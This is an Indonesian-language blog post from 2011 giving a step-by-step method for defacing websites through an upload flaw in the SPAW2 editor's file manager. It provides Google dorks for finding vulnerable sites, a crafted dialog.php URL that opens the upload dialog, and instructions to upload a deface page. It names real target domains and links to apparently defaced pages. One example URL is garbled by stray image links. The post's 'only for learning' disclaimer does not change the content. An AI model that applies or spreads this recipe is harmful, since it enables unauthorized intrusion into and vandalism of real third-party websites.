Selasa, 23 Agustus 2011

hacking web Spaw Upload Vulnerably

pertama buka pencarian google

paste dork di bawah ini ke google ...



dorknya : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/” :licik



Jika sudah dapet targetnya…

contoh targetnya misal: http://www.alometindo.com/bin/spaw2/dialogs/

bagian : spaw2/dialogs/



GANTI DENGAN



spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files



MAKA HASILNYA SEPERTI INI



http://www.alometindo.com/bin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da7hthttp://www.blogger.com/img/blank.giftp://www.blogger.com/img/blank.gif52d98cac9&type=files



halaman untuk upload File kan ada

Ganti menjadi files pada lokasi penyimpanan.

Browse file index Deface kamu, & upload.

Apabila file sukses diupload.akan terlihat file uploadtan tadi dsebelah kanan

sellesai ... hanya pembelajaran saja



contoh :



http://climatechange.jgsee.org/Admin/spaw2/uploads/files/japarus.html



http://www.alometindo.com/bin/spaw2/uploads/files/japarus.html

1 komentar:

Poskan Komentar